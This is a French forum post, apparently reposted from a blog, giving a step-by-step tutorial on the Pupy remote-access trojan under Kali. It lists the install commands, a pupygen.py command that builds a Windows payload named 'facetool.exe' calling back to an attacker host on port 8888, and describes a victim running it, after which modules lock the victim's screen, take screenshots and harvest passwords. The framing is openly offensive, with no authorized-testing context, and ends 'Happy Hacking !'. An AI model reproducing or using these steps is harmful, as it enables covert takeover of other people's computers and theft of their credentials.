Ldfa Posté(e) le 30 décembre 2019 Partager Posté(e) le 30 décembre 2019 Pupy est outil RAT (Remote Administration Tool) en d’autres termes, un outil capable de contrôler à distance un ordinateur. C’est un outil Open Source, multi plate-forme, et également doté d’un interpréteur écrit en Python.Il offre la possibilité d’exécuter des modules uniquement dans la mémoire laissant ainsi très peu de traces sur la machine victime.Pupy peut également générer des payloads dans plusieurs types de format de fichier comme des exécutables, des fichiers dll, les apk, etc.Dans ce billet, nous verrons comment l’installer, puis l’utiliser sous Kali. Installez Pupy en suivant ces étapes : git clone https://github.com/n1nj4sec/pupy.gitcd pupygit submodule initgit submodule updatepip install -r requirements.txt Commençons par créer un fichier malicieux à l’aide du générateur de payload pupygen.py.Voici les options disponibles du script : Créons un payload destiné à la plate-forme Windows 64-bit à l’aide des options suivantes : ./pupygen.py -f exe_x64 -o facetool.exe connect –host 192.168.1.16:8888 -f exe_x64 représente le format de fichier,-o facetool.exe l’output qui comprend le nom du fichier (facetool) et l’extension (exe),–host 192.168.1.16:8888 l’adresse hôte suivi du port. Si vous ne changez pas de port, le script choisira le port 443 (HTTPS), le port par défaut. Le payload ainsi généré est stocké dans le dossier pupy/pupy. La prochaine étape consiste à changer le port entrant dans le fichier de configuration de Pupy pupy.config.default. Avant de lancer Pupy, il faudra démarrer le service Postgresql service postgresql start Puis, lancez Pupy à l’aide du script ./pupysh.py.La victime, ayant cliqué sur le malware, une session s’est ouverte automatiquement dans notre shell Pupy.Pour voir les options disponibles dans le shell, saisissez help. Listez tous les modules disponibles à l’aide de list_modules. Muni de ces modules, vous pourriez réaliser plusieurs choses intéressantes.Par exemple, le module manage/lock_screen vérrouille instantannément l’écran de la victime. Le module creds/lazagne conçu à partir de Lazagne récupère les mots de passe de la victime. Le module gather/screenshot réalise une capture de l’écran de la victime. Happy Hacking ! mdestroy Share this: Afficher l’article complet Lien vers le commentaire Partager sur d’autres sites More sharing options...
Messages recommandés
Archivé
Ce sujet est désormais archivé et ne peut plus recevoir de nouvelles réponses.